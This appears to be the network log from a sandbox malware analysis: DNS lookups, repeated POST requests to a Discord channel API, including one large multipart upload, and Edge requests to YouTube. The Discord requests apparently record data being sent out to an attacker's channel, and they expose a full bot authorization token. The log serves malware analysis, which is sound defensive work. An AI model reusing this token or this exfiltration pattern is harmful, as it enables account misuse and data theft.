Set-Cookie: __dcfduid=c6e7ef16dfd411ef9996c2d6d783ef3f; Expires=Wed, 30-Jan-2030 13:10:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329044.446
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WHkRxxf8EBdx3ckmWSR%2ByZuig4g5UnEfnBqmwlA5Nysdt0Slu5C6hgSnxuQ4g95VWKMSVdHQnqmyojz4q3ZizlcBiUVXGkLT5WCoKFJFgEBF%2FFsrbrlNiL8E3uq%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=c6e7ef16dfd411ef9996c2d6d783ef3fdc50f3e1d9ecc93234d4fa14a85c670234bdcb7969907aac57338f8648c7f5f6; Expires=Wed, 30-Jan-2030 13:10:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c7e59d20149b30b86932b88af68cc12f1b863c87-1738329043; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=YcoGtTcRUtM1.9D.DEhoG1GVVEOWBv2DL0WBl7HNYzI-1738329043541-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f188df3879c0-LHR
-
Remote address:8.8.8.8:53Request233.128.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request138.201.86.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request253.102.89.159.in-addr.arpaIN PTRResponse
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: multipart/form-data; boundary="7d810009-e84b-420d-8321-e566e904f4e9"
Host: discord.com
Content-Length: 428239
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=cd2e91aedfd411ef9f3f8eb5001af674; Expires=Wed, 30-Jan-2030 13:10:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329054.714
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xi7EWmcYHR5LajoAB2%2BYfT%2B5GzE28GLxMlqz3rqDc0t5rZeDnVhvvEgFrziEbV8TWy7o2ljB%2FQyRrliooQzpGbRphrh8a6MtaOU2scRJ5l9UeAN1qvQK%2FKCROkvj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=cd2e91aedfd411ef9f3f8eb5001af67474278ae5157a11597f77cf85a0a29d0d9d4e196c75e435b63ea8887df1a3bb62; Expires=Wed, 30-Jan-2030 13:10:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=3ddd7070206f894bb12b565e526d2f62c0650911-1738329054; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=noblI4uuRZs2UlHvyidFuUxmY70.kXz2azrd9mu2zho-1738329054064-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f1c7be54ef29-LHR
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=cd699bd2dfd411ef8a51b2a9246787ec; Expires=Wed, 30-Jan-2030 13:10:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1738329055.720
x-ratelimit-reset-after: 1.377
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXWyfWYcKqU9rQLkWQxWfa8y3m1mDvBiXKgyES9iQxghjD6couHh0ZkDDPmufReUL9EJzAuJupsDpwhw6UMw5TTaya5pzQqeMsu7Y5MdtFKErBZLs7t7XjxP7jv%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=cd699bd2dfd411ef8a51b2a9246787ecf800a9ee24e1928f5b109054d02560dccf77e36bc787401436bcb24f5a82f0e7; Expires=Wed, 30-Jan-2030 13:10:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=3ddd7070206f894bb12b565e526d2f62c0650911-1738329054; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=RZo.cjPgUF4tWTBSaSAIPB61sz4T61.OYyEkNAG3Z1Y-1738329054451-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f1ccdd02ecfe-LHR
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=dc64bf7cdfd411efa4af12f8184e233a; Expires=Wed, 30-Jan-2030 13:11:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329080.505
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsbabwbmTWcGUVBM2d%2FOhVl2P0lWt0KgjdmDsLLTWCK122vr6ggZfaPZyymOeOZN0QT%2FnlPzcJOOji7GVSR68%2BPLCggePvetL91myr9s%2F%2FuQtNxAMjpZ0FmmB25I"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=dc64bf7cdfd411efa4af12f8184e233aa91bfc9b849be0391f36a4a35c0a1f85420d6a9811d4472f3f973c99aef54508; Expires=Wed, 30-Jan-2030 13:11:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=66af10ab95f6b8ad402feb029711f915a447c67a-1738329079; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=72P_TJOUj92lEsJgQROQhXsOhXq5biN3lmqqzWQ2Ub0-1738329079587-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f26a1ae1652a-LHR
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=e94d3a66dfd411efa7c24e788a2adc1a; Expires=Wed, 30-Jan-2030 13:11:41 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329102.152
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=det0TLHwtQkfYSQib8b3rVdlmPNa8Y8sWzbwtX5CMZEHN5teriQDgMUvpomIkQnWao4hJpxUixhx4fpgiRaKqiLlmK61b8RynEZRZm3eWGPbQr44gA%2BqnhdAzULj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=e94d3a66dfd411efa7c24e788a2adc1a0aff6638f62282f99f46261419f0b98035d745e6e39e598c77667415884768e4; Expires=Wed, 30-Jan-2030 13:11:41 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=76cd57415423525b39060b5e2e526ce77e99badb-1738329101; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=og6HcH_QeHzfVSgDdQmilEfK6Sd0VDeXCf76GuNfJVc-1738329101244-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f2f17dd1eff1-LHR
-
Remote address:8.8.8.8:53Request13.153.16.2.in-addr.arpaIN PTRResponse13.153.16.2.in-addr.arpaIN PTRa2-16-153-13deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A216.58.213.4
-
Remote address:8.8.8.8:53Request227.179.250.142.in-addr.arpaIN PTRResponse227.179.250.142.in-addr.arpaIN PTRlhr25s31-in-f31e100net
-
Remote address:8.8.8.8:53Request202.187.250.142.in-addr.arpaIN PTRResponse202.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f101e100net
-
Remote address:8.8.8.8:53Request4.213.58.216.in-addr.arpaIN PTRResponse4.213.58.216.in-addr.arpaIN PTRber01s14-in-f41e100net4.213.58.216.in-addr.arpaIN PTRlhr25s25-in-f4�F
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A216.58.212.206
-
Remote address:8.8.8.8:53Request206.212.58.216.in-addr.arpaIN PTRResponse206.212.58.216.in-addr.arpaIN PTRams16s21-in-f2061e100net206.212.58.216.in-addr.arpaIN PTRlhr25s27-in-f14�J206.212.58.216.in-addr.arpaIN PTRams16s21-in-f14�J
-
Remote address:8.8.8.8:53Requestchrome.google.comIN AResponsechrome.google.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A142.250.179.238
-
Remote address:8.8.8.8:53Request238.179.250.142.in-addr.arpaIN PTRResponse238.179.250.142.in-addr.arpaIN PTRlhr25s31-in-f141e100net
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=fd3f0dbadfd411ef961e7661d215cdd6; Expires=Wed, 30-Jan-2030 13:12:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329135.608
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Ra1CvudKiS01Bn2ETqtQhbq8PvEdFNipLW6vIIRYzNVePehPxp%2BD5f%2Fbq0ufN2Ft%2BpnjTxitscsZcB6O0HhFLpdoMow%2FbFenkDlN7XLEgO5XldIKSzgcOO2q%2F0K"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=fd3f0dbadfd411ef961e7661d215cdd64e71014be9cccdf1d7762957b193103837f91fd516370e172f90c780490c49e2; Expires=Wed, 30-Jan-2030 13:12:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=735d859b9ed1dcaaf05239dbf2d0db42a9a8e369-1738329134; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=Q2zBfkDhnNPAES8H9kmMzIQXO7tw95W6va4Yb_JEPac-1738329134704-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f3c29a0fefe9-LHR
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=00f516b6dfd511efb1d9c62af2d97bab; Expires=Wed, 30-Jan-2030 13:12:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329141.860
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFK59vRvsJMPRZ%2B7DoNK%2FuQFW5HsLyGX%2B2TL%2Fr0z8Z3JsRixudvl8MI%2BAwypyS%2BXZ5aRMdHJfoNUYSYeCQYe2MUDliZpshGzAUjKDXvRJig1gL4ghNPlmevVBEIr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=00f516b6dfd511efb1d9c62af2d97bab7d1d86a601c1f1ca6a3539544a9ed09e8b312b61f92237507ecd3553a387c26f; Expires=Wed, 30-Jan-2030 13:12:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=3c4af99ee7c57dc8967352be3e21c4cdd1d44c16-1738329140; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=KjNX966etv4o5ga_HUmEIpoWv5ML6Txad2UEpAskjEs-1738329140929-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f3e9a872f668-LHR
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=048f8284dfd511efb8416e444ea3a8f0; Expires=Wed, 30-Jan-2030 13:12:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329147.895
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Ri1Fls4WVx4b89i4l%2BdDGaX1OqtZ9aP1wi3cwkkcu%2Fg8ad8VqZaWSN%2Bn%2F5Q2LeRMdrblWeqq4xOATHKhkMr7jW8zaRG60Bwj0eElkaIv1bZs3PPIf43LCQtOsMh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=048f8284dfd511efb8416e444ea3a8f0a28ab5194ca548665729bfafa8ed20e20ff132115da975c23fd876860666b573; Expires=Wed, 30-Jan-2030 13:12:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=65ff89d9defd91f0bd066d5322d9b6d9a9069ef1-1738329146; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=DtuBdlioSGw_tFDsnHKM6j8Vy2DRCv9Ih_Mk1Q47Uqo-1738329146977-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f40f5f8194e1-LHR
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=0ca3affedfd511efb3b3feec9d74a68a; Expires=Wed, 30-Jan-2030 13:12:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329161.447
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mp5nlYk%2FLB7mozhPVIQwVinvo1fTH9MHJL%2BRqI0Tqzb3PWCOejykgDq5Oyp%2Fq6Dnb5v95opO5mEaOdeYT6WYST9L87hcWbneCIarAn3TEOLTREeSJurAUoeu%2FRfk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=0ca3affedfd511efb3b3feec9d74a68a3c36b99f726d990532a1f5479d38dcedd86cbce85046bb0d734db4678661c7bd; Expires=Wed, 30-Jan-2030 13:12:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=eb7c5760d4be0a930b5ddf448386e2750a709d60-1738329160; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=b65x5e8I.Nz_1Rr.wYuN1kW716iKUoJZodMiPWhRDEI-1738329160529-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f463bdbf88c1-LHR
-
Remote address:8.8.8.8:53Requestyoutube.comIN AResponseyoutube.comIN A142.250.200.46
-
Remote address:142.250.200.46:443RequestGET / HTTP/2.0
host: youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.200.46:443RequestGET / HTTP/2.0
host: www.youtube.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/desktop_polymer.vflset/desktop_polymer.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
-
GEThttps://www.youtube.com/s/desktop/b1a23d83/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.jsmsedge.exeRemote address:142.250.200.46:443RequestGET /s/desktop/b1a23d83/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
